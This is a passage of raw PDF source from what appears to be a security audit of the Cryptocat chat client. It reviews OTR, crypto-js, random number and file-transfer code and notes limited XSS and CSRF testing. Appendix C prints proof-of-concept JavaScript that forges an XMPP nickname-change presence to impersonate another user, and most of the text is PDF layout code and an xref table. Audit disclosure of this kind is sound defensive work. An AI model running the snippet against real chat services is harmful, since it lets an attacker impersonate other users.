TL ET q 1 0 0 1 6 33 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 38 Tm /F1 10 Tf 12 TL 2.146412 Tw (Part of this issue is that the Chrome store automatically transcodes images which changes the) Tj T* 0 Tw 1.150651 Tw (archive contents and hash from what a developer submits. This inhibits an auditor from building a) Tj T* 0 Tw .478555 Tw (Chrome package to compare against the Chrome store release. We attempted to notify the Chrome) Tj T* 0 Tw (store about this issue.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 660.0236 cm Q q 1 0 0 1 62.69291 642.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (We examined changes in the ) Tj /F4 10 Tf (otr.js ) Tj /F1 10 Tf (dependency.) 
Tj T* ET Q Q q 1 0 0 1 62.69291 636.0236 cm Q q 1 0 0 1 62.69291 636.0236 cm Q q 1 0 0 1 62.69291 624.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (Discovered ) Tj /F4 10 Tf (extra_symkey ) Tj /F1 10 Tf (which is used for file transfer.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 624.0236 cm Q q 1 0 0 1 62.69291 594.0236 cm q BT 1 0 0 1 0 14 Tm .241318 Tw 12 TL /F1 10 Tf 0 0 0 rg (We examined ) Tj /F4 10 Tf (otr.js) Tj /F1 10 Tf ( ) Tj /F4 10 Tf (prepareMsg\(\) ) Tj /F1 10 Tf (function which is used for both chat messages and to initiate file) Tj T* 0 Tw (transfers.) Tj T* ET Q Q q 1 0 0 1 62.69291 588.0236 cm Q q 1 0 0 1 62.69291 588.0236 cm Q q 1 0 0 1 62.69291 564.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 9 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 14 Tm 3.316905 Tw 12 TL /F1 10 Tf 0 0 0 rg (Things we ) Tj /F3 10 Tf (didn't ) Tj /F1 10 Tf (cover: ) Tj /F3 10 Tf (SMP) Tj /F1 10 Tf (-based authentication, the user interface when it fails, the code) Tj T* 0 Tw (implementing same.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 564.0236 cm Q q 1 0 0 1 62.69291 534.0236 cm q BT 1 0 0 1 0 14 Tm .122196 Tw 12 TL /F1 10 Tf 0 0 0 rg (We examined file transfer thoroughly throughout the ) Tj /F4 10 Tf (cryptocat.js) Tj /F1 10 Tf (, ) Tj /F4 10 Tf (etc/fileTransfer.js) Tj /F1 10 Tf (, ) Tj /F4 10 Tf (otr.js) Tj /F1 10 Tf (,) Tj T* 0 Tw (and ) Tj /F4 10 Tf (lib/crypto-js/*.js) Tj /F1 10 Tf (.) 
Tj T* ET Q Q q 1 0 0 1 62.69291 528.0236 cm Q q 1 0 0 1 62.69291 528.0236 cm Q q 1 0 0 1 62.69291 462.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 51 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 39 cm q BT 1 0 0 1 0 14 Tm .001984 Tw 12 TL /F1 10 Tf 0 0 0 rg (We mainly focused on the call stack in the ) Tj /F4 10 Tf (crypto-js ) Tj /F1 10 Tf (dependency, rather than analysing the entire) Tj T* 0 Tw (codebase, so we focused on the ) Tj /F3 10 Tf (AES ) Tj /F1 10 Tf (and ) Tj /F3 10 Tf (CTR ) Tj /F1 10 Tf (mode implementations.) Tj T* ET Q Q q 1 0 0 1 23 33 cm Q q 1 0 0 1 23 33 cm Q q 1 0 0 1 23 -3 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 21 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 26 Tm 1.819398 Tw 12 TL /F1 10 Tf 0 0 0 rg (Note: We have a concern about a potential security failure if ) Tj /F3 10 Tf (IV ) Tj /F1 10 Tf (is the wrong type, size, or) Tj T* 0 Tw 1.72816 Tw (element type/range when using counter mode in this dependency. We analyzed ) Tj /F3 10 Tf (Cryptocat) Tj /F1 10 Tf ('s) Tj T* 0 Tw (current call sites and believe it uses ) Tj /F3 10 Tf (IV ) Tj /F1 10 Tf (s of the correct type and size.) Tj T* ET Q Q q Q Q q 1 0 0 1 23 -3 cm Q q Q Q q 1 0 0 1 62.69291 456.0236 cm Q q 1 0 0 1 62.69291 390.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 51 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 27 cm q BT 1 0 0 1 0 26 Tm 1.06998 Tw 12 TL /F1 10 Tf 0 0 0 rg (We investigated a concerning counter rollover behavior in ) Tj /F4 10 Tf (crypto-js ) Tj /F1 10 Tf (and verified that ) Tj /F3 10 Tf (Cryptocat) Tj T* 0 Tw .486651 Tw /F1 10 Tf (currently will never cause this rollover in file-transfer encryption. However, this is a danger for future) Tj T* 0 Tw (development.) 
Tj T* ET Q Q q 1 0 0 1 23 21 cm Q q 1 0 0 1 23 21 cm Q q 1 0 0 1 23 -3 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 9 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 14 Tm .509985 Tw 12 TL /F1 10 Tf 0 0 0 rg (The restriction on file transfer ) Tj /F3 10 Tf (MIME ) Tj /F1 10 Tf (type is described in the UI but not documented or justified) Tj T* 0 Tw (in the ) Tj 0 0 .501961 rg (Wiki Specification of File Transfer) Tj 0 0 0 rg (.) Tj T* ET Q Q q Q Q q 1 0 0 1 23 -3 cm Q q Q Q q 1 0 0 1 62.69291 390.0236 cm Q q 1 0 0 1 62.69291 372.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (We investigated the entire source and use of ) Tj /F4 10 Tf (etc/random.js) Tj /F1 10 Tf (:) Tj T* ET Q Q q 1 0 0 1 62.69291 366.0236 cm Q q 1 0 0 1 62.69291 366.0236 cm Q q 1 0 0 1 62.69291 342.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 9 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 14 Tm 5.494418 Tw 12 TL /F1 10 Tf 0 0 0 rg (Examined how seeds are distributed to web workers: ) Tj /F4 10 Tf (workers/keyGenerator.js ) Tj /F1 10 Tf (and) Tj T* 0 Tw /F4 10 Tf (workers/smp.js) Tj /F1 10 Tf (.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 336.0236 cm Q q 1 0 0 1 62.69291 288.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 33 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 38 Tm /F1 10 Tf 12 TL 1.112651 Tw (We examined the API and call sites to gain assurance that there are not insufficient-entropy flaws) Tj T* 0 Tw 1.52686 Tw (due to buffer encodings as have been discovered in the past. The new API makes the encoding) Tj T* 0 Tw 1.543059 Tw (much more explicit using explicitly-named encodings. We believe the correct encoding is used at) Tj T* 0 Tw (each call site, so we have confidence this kind of flaw is not present in the current codebase.) 
Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 288.0236 cm Q q 1 0 0 1 62.69291 234.0236 cm q BT 1 0 0 1 0 38 Tm .49784 Tw 12 TL /F1 10 Tf 0 0 0 rg (We also briefly skimmed the complete source to ) Tj /F4 10 Tf (lib/salsa20.js ) Tj /F1 10 Tf (to identify any glaring problems, but) Tj T* 0 Tw 2.439269 Tw (saw none. We did not thoroughly verify the implementation correctness, such as by comparing test) Tj T* 0 Tw 1.60229 Tw (vectors against other implementations, nor did we analyze side-channel issues which may leak secret) Tj T* 0 Tw (state.) Tj T* ET Q Q q 1 0 0 1 62.69291 204.0236 cm q BT 1 0 0 1 0 14 Tm .964524 Tw 12 TL /F1 10 Tf 0 0 0 rg (We examined portions of ) Tj /F4 10 Tf (lib/strophe/ ) Tj /F1 10 Tf (relevant to understanding interactions between ) Tj /F3 10 Tf (XMPP) Tj /F1 10 Tf (, ) Tj /F3 10 Tf (OTR) Tj /F1 10 Tf (,) Tj T* 0 Tw (and ) Tj /F3 10 Tf (Cryptocat ) Tj /F1 10 Tf (data structures and event interleaving.) Tj T* ET Q Q q 1 0 0 1 62.69291 186.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (We did minimal analysis on the potential for ) Tj /F3 10 Tf (XSS ) Tj /F1 10 Tf (and ) Tj /F3 10 Tf (CSRF ) Tj /F1 10 Tf (vulnerabilities:) Tj T* ET Q Q q 1 0 0 1 62.69291 180.0236 cm Q q 1 0 0 1 62.69291 180.0236 cm Q q 1 0 0 1 62.69291 120.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 45 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 50 Tm 2.903059 Tw 12 TL /F1 10 Tf 0 0 0 rg (We believe ) Tj /F3 10 Tf (BOSH ) Tj /F1 10 Tf (is resistant to ) Tj /F3 10 Tf (CSRF ) Tj /F1 10 Tf (attacks provided the ) Tj /F4 10 Tf (sid ) Tj /F1 10 Tf (parameter is unguessable.) Tj T* 0 Tw .985984 Tw (Viewing requests and responses in the browser's developer tools suggests this is true. We did not) Tj T* 0 Tw 1.529985 Tw (analyze if participants in a group chat can learn sufficient details to create a ) Tj /F3 10 Tf (CSRF ) Tj /F1 10 Tf (attack vector) Tj T* 0 Tw .316235 Tw (against other users. 
\(Also, if this were a problem, it would be common to all ) Tj /F3 10 Tf (BOSH ) Tj /F1 10 Tf (implementations.) Tj T* 0 Tw (We have not yet investigated if this is a commonly known issue.\)) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 114.0236 cm Q q 1 0 0 1 62.69291 78.02362 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 21 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 26 Tm .099986 Tw 12 TL /F1 10 Tf 0 0 0 rg (We performed only a few ) Tj /F3 10 Tf (XSS ) Tj /F1 10 Tf (tests, such as injections in the username or chat contents. The former) Tj T* 0 Tw .516905 Tw (is inconclusive because we did not bypass client-based input-side restrictions that a malicious client) Tj T* 0 Tw (could bypass, and the latter was unsuccessful.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 76.86614 cm Q endstream endobj % 'R203': class PDFStream 203 0 obj % page stream << /Length 2867 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 753.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (Our investigation into these kinds of web-frontend attacks was not very thorough.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 753.0236 cm Q q 1 0 0 1 62.69291 735.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (We did investigate ) Tj /F4 10 Tf (lib/bigint.js) Tj /F1 10 Tf (:) Tj T* ET Q Q q 1 0 0 1 62.69291 729.0236 cm Q q 1 0 0 1 62.69291 729.0236 cm Q q 1 0 0 1 62.69291 717.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (Found and filed a performance bug which we do not believe is security relevant, ) Tj 0 0 .501961 rg (OTR Issue 41) Tj 0 0 0 rg (.) 
Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 711.0236 cm Q q 1 0 0 1 62.69291 699.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (Examined implementation of Maurer's algorithm before realizing it is unexercised in ) Tj /F3 10 Tf (Cryptocat) Tj /F1 10 Tf (.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 699.0236 cm Q q 1 0 0 1 62.69291 657.0236 cm q BT 1 0 0 1 0 26 Tm .894147 Tw 12 TL /F1 10 Tf 0 0 0 rg (We investigated the potential for cross-site ) Tj /F4 10 Tf (postMessage\(\) ) Tj /F1 10 Tf (abuse against the web workers; however,) Tj T* 0 Tw .652126 Tw (they are anonymous web workers, and thus protected against this attack vector by ) Tj /F3 10 Tf (JavaScript ) Tj /F1 10 Tf (referential) Tj T* 0 Tw (semantics.) Tj T* ET Q Q q 1 0 0 1 62.69291 639.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (Investigated authentication, mainly in one-to-one ) Tj /F3 10 Tf (OTR ) Tj /F1 10 Tf (chat:) Tj T* ET Q Q q 1 0 0 1 62.69291 633.0236 cm Q q 1 0 0 1 62.69291 633.0236 cm Q q 1 0 0 1 62.69291 621.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (Filed ) Tj /F3 10 Tf (Issue 506 ) Tj /F1 10 Tf (about a dubious time-based retry loop for sending public keys.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 621.0236 cm Q q 1 0 0 1 62.69291 603.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (Experimented with nickname reuse between clients at different times in the same channel.) 
Tj T* ET Q Q q 1 0 0 1 62.69291 603.0236 cm Q endstream endobj % 'R204': class PDFStream 204 0 obj % page stream << /Length 1900 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 744.0236 cm q BT 1 0 0 1 0 3.5 Tm 21 TL /F2 17.5 Tf 0 0 0 rg (Appendix C: Exploit Code for Issue G) Tj T* ET Q Q q 1 0 0 1 62.69291 726.0236 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (The following code, triggered on connection to the server, was used to verify Issue G:) Tj T* ET Q Q q 1 0 0 1 62.69291 443.5142 cm q q .814085 0 0 .814085 0 0 cm q 1 0 0 1 6.6 8.107263 cm q .662745 .662745 .662745 RG .5 w .960784 .960784 .862745 rg n -6 -6 576 336 re B* Q q 0 0 0 rg BT 1 0 0 1 0 314 Tm /F4 10 Tf 12 TL (if \(Cryptocat.myNickname == 'mallory'\) {) Tj T* ( try {) Tj T* ( var delay = 30;) Tj T* ( var newNickname = 'bob';) Tj T* T* ( console.log\('Hacking commences in ' + delay + 's'\);) Tj T* T* ( // Cryptocat.xmpp.connection.muc on trunk) Tj T* ( var muc = Cryptocat.connection.muc;) Tj T* ( // Cryptocat.xmpp.conferenceServer on trunk) Tj T* ( var roomPrefix = Cryptocat.conversationName + '@' + Cryptocat.conferenceServer + '/';) Tj T* T* ( var fromJID = muc._connection.jid;) Tj T* ( var presence = new Strophe.Builder\('presence', {to: roomPrefix + Cryptocat.myNickname,) Tj T* ( from: fromJID}\)) Tj T* ( .c\('status', {code: '303'}\).up\(\)) Tj T* ( .c\('item', {nick: newNickname}\).tree\(\);) Tj T* ( console.log\(presence\);) Tj T* ( window.setTimeout\(function\(\) {) Tj T* ( console.log\('Sending the presence message:', presence\);) Tj T* ( muc._connection.send\(presence\);) Tj T* ( console.log\('Sent it'\);) Tj T* ( }, delay*1000\);) Tj T* ( } catch\(e\) {) Tj T* ( console.log\(e, e.stack\);) Tj T* ( }) Tj T* (}) Tj T* ET Q Q Q Q Q endstream endobj % 'R205': class PDFPageLabels 205 0 obj % Document Root << /Nums [ 0 206 0 R 1 207 0 R 2 208 0 R 3 209 0 R 4 210 0 R 5 211 0 R 6 212 0 R 7 213 0 R 8 214 0 R 9 215 0 R 10 216 0 R 11 217 0 R 12 218 0 R 13 219 0 R 14 220 0 R 15 
221 0 R 16 222 0 R 17 223 0 R 18 224 0 R 19 225 0 R 20 226 0 R 21 227 0 R 22 228 0 R 23 229 0 R 24 230 0 R 25 231 0 R 26 232 0 R ] >> endobj % 'R206': class PDFPageLabel 206 0 obj % None << /S /D /St 1 >> endobj % 'R207': class PDFPageLabel 207 0 obj % None << /S /D /St 2 >> endobj % 'R208': class PDFPageLabel 208 0 obj % None << /S /D /St 3 >> endobj % 'R209': class PDFPageLabel 209 0 obj % None << /S /D /St 4 >> endobj % 'R210': class PDFPageLabel 210 0 obj % None << /S /D /St 5 >> endobj % 'R211': class PDFPageLabel 211 0 obj % None << /S /D /St 6 >> endobj % 'R212': class PDFPageLabel 212 0 obj % None << /S /D /St 7 >> endobj % 'R213': class PDFPageLabel 213 0 obj % None << /S /D /St 8 >> endobj % 'R214': class PDFPageLabel 214 0 obj % None << /S /D /St 9 >> endobj % 'R215': class PDFPageLabel 215 0 obj % None << /S /D /St 10 >> endobj % 'R216': class PDFPageLabel 216 0 obj % None << /S /D /St 11 >> endobj % 'R217': class PDFPageLabel 217 0 obj % None << /S /D /St 12 >> endobj % 'R218': class PDFPageLabel 218 0 obj % None << /S /D /St 13 >> endobj % 'R219': class PDFPageLabel 219 0 obj % None << /S /D /St 14 >> endobj % 'R220': class PDFPageLabel 220 0 obj % None << /S /D /St 15 >> endobj % 'R221': class PDFPageLabel 221 0 obj % None << /S /D /St 16 >> endobj % 'R222': class PDFPageLabel 222 0 obj % None << /S /D /St 17 >> endobj % 'R223': class PDFPageLabel 223 0 obj % None << /S /D /St 18 >> endobj % 'R224': class PDFPageLabel 224 0 obj % None << /S /D /St 19 >> endobj % 'R225': class PDFPageLabel 225 0 obj % None << /S /D /St 20 >> endobj % 'R226': class PDFPageLabel 226 0 obj % None << /S /D /St 21 >> endobj % 'R227': class PDFPageLabel 227 0 obj % None << /S /D /St 22 >> endobj % 'R228': class PDFPageLabel 228 0 obj % None << /S /D /St 23 >> endobj % 'R229': class PDFPageLabel 229 0 obj % None << /S /D /St 24 >> endobj % 'R230': class PDFPageLabel 230 0 obj % None << /S /D /St 25 >> endobj % 'R231': class PDFPageLabel 231 0 obj % None << /S /D /St 26 >> 
endobj % 'R232': class PDFPageLabel 232 0 obj % None << /S /D /St 27 >> endobj xref 0 233 0000000000 65535 f 0000000113 00000 n 0000000286 00000 n 0000000451 00000 n 0000000638 00000 n 0000000888 00000 n 0000001137 00000 n 0000001386 00000 n 0000001622 00000 n 0000001962 00000 n 0000002203 00000 n 0000002445 00000 n 0000002687 00000 n 0000002929 00000 n 0000003172 00000 n 0000003415 00000 n 0000003658 00000 n 0000003901 00000 n 0000004144 00000 n 0000004387 00000 n 0000004630 00000 n 0000004873 00000 n 0000005116 00000 n 0000005359 00000 n 0000005602 00000 n 0000005845 00000 n 0000006088 00000 n 0000006331 00000 n 0000006574 00000 n 0000006817 00000 n 0000007060 00000 n 0000007303 00000 n 0000007546 00000 n 0000007789 00000 n 0000008032 00000 n 0000008275 00000 n 0000008518 00000 n 0000008761 00000 n 0000009004 00000 n 0000009247 00000 n 0000009490 00000 n 0000009734 00000 n 0000009978 00000 n 0000010222 00000 n 0000010466 00000 n 0000010710 00000 n 0000010954 00000 n 0000011198 00000 n 0000011442 00000 n 0000011686 00000 n 0000011930 00000 n 0000012174 00000 n 0000012418 00000 n 0000012662 00000 n 0000012906 00000 n 0000013150 00000 n 0000013394 00000 n 0000013638 00000 n 0000013882 00000 n 0000014126 00000 n 0000014370 00000 n 0000014614 00000 n 0000014858 00000 n 0000015102 00000 n 0000015346 00000 n 0000015590 00000 n 0000015834 00000 n 0000016078 00000 n 0000016322 00000 n 0000016566 00000 n 0000016810 00000 n 0000017054 00000 n 0000017297 00000 n 0000017543 00000 n 0000017769 00000 n 0000017964 00000 n 0000018213 00000 n 0000018437 00000 n 0000019335 00000 n 0000019511 00000 n 0000019755 00000 n 0000019985 00000 n 0000020173 00000 n 0000020485 00000 n 0000020782 00000 n 0000021039 00000 n 0000021342 00000 n 0000021626 00000 n 0000021783 00000 n 0000022080 00000 n 0000022320 00000 n 0000022623 00000 n 0000022920 00000 n 0000023175 00000 n 0000023473 00000 n 0000023725 00000 n 0000024061 00000 n 0000024307 00000 n 0000024478 00000 n 0000024782 00000 n 
0000025079 00000 n 0000025379 00000 n 0000025665 00000 n 0000025981 00000 n 0000026280 00000 n 0000026525 00000 n 0000026755 00000 n 0000027086 00000 n 0000027331 00000 n 0000027561 00000 n 0000027877 00000 n 0000028176 00000 n 0000028419 00000 n 0000028662 00000 n 0000028918 00000 n 0000029258 00000 n 0000029591 00000 n 0000029897 00000 n 0000030165 00000 n 0000030409 00000 n 0000030653 00000 n 0000030883 00000 n 0000031254 00000 n 0000031499 00000 n 0000031729 00000 n 0000032060 00000 n 0000032304 00000 n 0000032548 00000 n 0000032793 00000 n 0000033038 00000 n 0000033283 00000 n 0000033528 00000 n 0000033773 00000 n 0000034002 00000 n 0000034378 00000 n 0000034662 00000 n 0000034946 00000 n 0000035245 00000 n 0000035516 00000 n 0000035808 00000 n 0000036139 00000 n 0000036386 00000 n 0000036692 00000 n 0000036977 00000 n 0000037141 00000 n 0000037428 00000 n 0000037557 00000 n 0000037776 00000 n 0000037954 00000 n 0000038173 00000 n 0000038345 00000 n 0000038581 00000 n 0000038812 00000 n 0000039047 00000 n 0000039259 00000 n 0000039516 00000 n 0000039693 00000 n 0000039898 00000 n 0000040100 00000 n 0000040358 00000 n 0000040600 00000 n 0000040884 00000 n 0000041114 00000 n 0000041350 00000 n 0000041591 00000 n 0000041757 00000 n 0000041996 00000 n 0000042253 00000 n 0000042436 00000 n 0000042633 00000 n 0000042846 00000 n 0000043037 00000 n 0000043227 00000 n 0000043470 00000 n 0000043635 00000 n 0000043873 00000 n 0000044074 00000 n 0000044260 00000 n 0000044619 00000 n 0000046828 00000 n 0000056036 00000 n 0000061773 00000 n 0000070800 00000 n 0000074399 00000 n 0000081073 00000 n 0000089074 00000 n 0000093405 00000 n 0000101555 00000 n 0000105042 00000 n 0000113542 00000 n 0000121023 00000 n 0000124261 00000 n 0000127261 00000 n 0000134742 00000 n 0000138700 00000 n 0000140208 00000 n 0000146879 00000 n 0000157966 00000 n 0000165268 00000 n 0000174723 00000 n 0000184425 00000 n 0000194846 00000 n 0000198568 00000 n 0000208746 00000 n 0000211714 00000 n 
0000213719 00000 n 0000214196 00000 n 0000214275 00000 n 0000214354 00000 n 0000214433 00000 n 0000214512 00000 n 0000214591 00000 n 0000214670 00000 n 0000214749 00000 n 0000214828 00000 n 0000214907 00000 n 0000214987 00000 n 0000215067 00000 n 0000215147 00000 n 0000215227 00000 n 0000215307 00000 n 0000215387 00000 n 0000215467 00000 n 0000215547 00000 n 0000215627 00000 n 0000215707 00000 n 0000215787 00000 n 0000215867 00000 n 0000215947 00000 n 0000216027 00000 n 0000216107 00000 n 0000216187 00000 n 0000216267 00000 n trailer << /ID % ReportLab generated PDF document -- digest (http://www.reportlab.com) [(\200\022?\027&Ku\304\327P\032\034D\343\317\200) (\200\022?\027&Ku\304\327P\032\034D\343\317\200)] /Info 144 0 R /Root 143 0 R /Size 233 >> startxref 216316 %%EOF